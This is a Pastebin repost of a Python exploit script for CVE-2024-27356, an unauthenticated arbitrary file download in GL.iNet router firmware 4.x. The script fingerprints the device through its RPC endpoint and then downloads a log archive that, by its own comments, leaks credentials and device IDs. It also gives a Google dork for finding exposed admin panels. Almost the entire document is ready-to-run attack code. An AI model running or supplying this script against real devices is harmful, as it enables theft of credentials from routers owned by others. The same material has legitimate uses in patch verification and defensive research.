FlyFar

GL-iNet MT6000 4.5.5 - Arbitrary File Download - CVE-2024-27356

Apr 7th, 2024
62
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.28 KB | Cybersecurity | 0 0
  1. # Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download
  2. # CVE: CVE-2024-27356
  3. # Google Dork: intitle:"GL.iNet Admin Panel"
  4. # Date: 2/26/2024
  5. # Exploit Author: Bandar Alharbi (aggressor)
  6. # Vendor Homepage: www.gl-inet.com
  7. # Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin
  8. # Tested Model: GL-X3000 Spitz AX
  9. # Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md
  10.  
  11. import sys
  12. import requests
  13. import json
  14. requests.packages.urllib3.disable_warnings()
  15. h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}
  16.  
  17. def DoesTarExist():
  18.     r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)
  19.     if r.status_code == 200:
  20.         f = open("logread.tar", "wb")
  21.         f.write(r.content)
  22.         f.close()
  23.         print("[*] Full logs archive `logread.tar` has been downloaded!")
  24.         print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")
  25.         return True
  26.     else:
  27.         print("[*] The `logread.tar` archive does not exist however ... try again later!")
  28.         return False
  29.  
  30. def isVulnerable():
  31.     r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)
  32.     if r1.status_code == 500 and "nginx" in r1.text:
  33.         r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)
  34.         if  "Admin-Token" in r2.text:
  35.             j  = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}
  36.             r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)
  37.             ver = r3.json()['result']['firmware_version']
  38.             model = r3.json()['result']['model']
  39.             if ver.startswith(('4.')):
  40.                 print("[*] Firmware version (%s) is vulnerable!" %ver)
  41.                 print("[*] Device model is: %s" %model)
  42.                 return True
  43.     print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")
  44.     return False
  45.  
  46. def isAlive():
  47.     try:
  48.         r = requests.get(url, verify=False, timeout=30, headers=h)
  49.         if r.status_code != 200:
  50.             print("[*] Make sure the target's web interface is accessible!")
  51.             return False
  52.         elif r.status_code == 200:
  53.             print("[*] The target is reachable!")
  54.             return True
  55.     except Exception:
  56.         print("[*] Error occurred when connecting to the target!")
  57.         pass
  58.     return False
  59.  
  60. if __name__ == '__main__':
  61.     if len(sys.argv) != 2:
  62.         print("exploit.py url")
  63.         sys.exit(0)
  64.     url = sys.argv[1]
  65.     url = url.lower()
  66.     if not url.startswith(('http://', 'https://')):
  67.         print("[*] Invalid url format! It should be http[s]://<domain or ip>")
  68.         sys.exit(0)
  69.     if url.endswith("/"):
  70.         url = url.rstrip("/")
  71.  
  72.     print("[*] GL.iNet Unauthenticated Full Logs Downloader")
  73.  
  74.     try:
  75.         if (isAlive() and isVulnerable()) == (True and True):
  76.             DoesTarExist()
  77.     except KeyboardInterrupt:
  78.         print("[*] The exploit has been stopped by the user!")
  79.         sys.exit(0)
  80.            
Add Comment
Please, Sign In to add comment